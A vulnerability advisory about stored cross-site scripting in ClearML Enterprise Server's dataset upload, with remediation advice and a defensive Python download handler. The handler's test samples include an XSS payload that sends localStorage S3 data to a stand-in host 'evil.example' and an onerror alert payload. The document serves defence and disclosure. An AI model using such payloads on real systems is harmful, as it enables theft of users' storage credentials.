ClearML Enterprise Server Cross-Site Scripting Vulnerability in Dataset Upload Functionality

Vulnerability

A stored cross-site scripting vulnerability has been identified in ClearML Enterprise Server version 3.22.5-1533. The issue lies in the dataset upload feature: a specially crafted HTTP request can place arbitrary HTML into a dataset. An attacker able to upload to a dataset sends a series of HTTP requests that store malicious HTML files as dataset content. When an authenticated ClearML user later opens one of those files, the browser renders it and executes any JavaScript it contains. Browser local storage is readable only by scripts running in the same origin as the page that stored it, so a script rendered this way can read whatever the ClearML web UI keeps there and exfiltrate it, in particular information related to storage providers such as AWS S3.

Impact

Successful exploitation results in stored cross-site scripting: the injected script runs in the victim's browser with the privileges of that user's ClearML session. The attacker can then execute arbitrary JavaScript against the application and read and exfiltrate sensitive data from the user's browser local storage.

Remediation

Update to the latest version of ClearML Enterprise Server, in which this vulnerability is patched. As defence in depth, serve user-uploaded dataset files so that the browser cannot render them as HTML within the application origin: return them with a Content-Disposition: attachment header, an X-Content-Type-Options: nosniff header and a non-HTML content type, or serve downloads from a separate origin that holds no session or local-storage data. Also deploy a strict Content Security Policy that restricts script sources and blocks inline script. Sanitizing HTML content at upload time is a weaker, secondary control: it stops only the markup the filter recognizes, whereas refusing to render uploads removes the attack surface regardless of their content.
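One way to implement the serve-as-download control described above, as an added example that is not ClearML's own code: a Python download handler that decides, per stored dataset file, whether the browser may render it inline, and otherwise forces an opaque download. Everything here (the INLINE_SAFE_TYPES allow-list, the MARKUP_MARKERS sniff, build_response, safe_filename and the constructed sample uploads) is an assumption for illustration and does not reflect how ClearML stores or serves datasets.

```python
import mimetypes
import re
from dataclasses import dataclass, field

# Content types the server is willing to let the browser render inline.
# text/html and image/svg+xml are deliberately absent: both can carry script.
INLINE_SAFE_TYPES = {
    "image/png", "image/jpeg", "image/gif",
    "text/plain", "text/csv", "application/json",
}

# Cheap content sniff for markup that would execute if rendered: tag-like
# tokens for script-bearing elements, or an inline event-handler attribute.
MARKUP_MARKERS = re.compile(
    rb"<\s*(script|iframe|object|embed|svg|html|body|img|a|meta|link)\b|\bon\w+\s*=",
    re.IGNORECASE,
)


@dataclass
class ServedFile:
    """Headers and body the (hypothetical) download endpoint would return."""
    headers: dict = field(default_factory=dict)
    body: bytes = b""


def looks_like_markup(data: bytes) -> bool:
    """True if the first 4 KiB of the file contains HTML-like markup."""
    return MARKUP_MARKERS.search(data[:4096]) is not None


def safe_filename(name: str) -> str:
    """Reduce a user-supplied name to one path component in a conservative
    character set, so it cannot break the Content-Disposition header
    (quotes, CR/LF) or smuggle path traversal."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    cleaned = re.sub(r"[^A-Za-z0-9._-]", "_", base)
    return cleaned or "download"


def build_response(filename: str, data: bytes) -> ServedFile:
    """Decide how a stored dataset file is served.

    A file is rendered inline only when its declared type is on the allow-list
    AND its content does not look like markup; everything else is downloaded as
    an opaque blob. nosniff stops the browser from second-guessing the declared
    type, and the CSP denies script execution and sandboxes the document in
    case a response is rendered anyway.
    """
    guessed, _ = mimetypes.guess_type(filename)
    content_type = guessed or "application/octet-stream"
    render_inline = content_type in INLINE_SAFE_TYPES and not looks_like_markup(data)

    headers = {
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox; frame-ancestors 'none'",
    }
    if not render_inline:
        content_type = "application/octet-stream"
    disposition = "inline" if render_inline else "attachment"
    headers["Content-Type"] = content_type
    headers["Content-Disposition"] = f'{disposition}; filename="{safe_filename(filename)}"'
    return ServedFile(headers=headers, body=data)


if __name__ == "__main__":
    # Constructed sample uploads, not real ClearML dataset content.
    samples = {
        "report.html": b"<html><script>fetch('//evil.example/?'+localStorage.getItem('s3'))</script></html>",
        "chart.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
        "notes.txt": b"<img src=x onerror=alert(document.domain)>",
    }
    for name, data in samples.items():
        resp = build_response(name, data)
        print(f"{name}: {resp.headers['Content-Type']}; {resp.headers['Content-Disposition']}")
```

The decision never depends on recognizing every dangerous HTML construct: an .html upload is downloaded regardless of its content, and the content sniff only adds a second layer for files whose declared type is benign, such as a .txt that actually carries a tag with an event handler. The CSP with the sandbox directive is the fallback should a rendered response slip through; it also blocks inline script, which is what a "strict Content Security Policy" must do to stop this class of payload.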

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 1.7
exploitability: 5.0
remediation: 0.0
relevance: 0.0
threat: 0.0
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.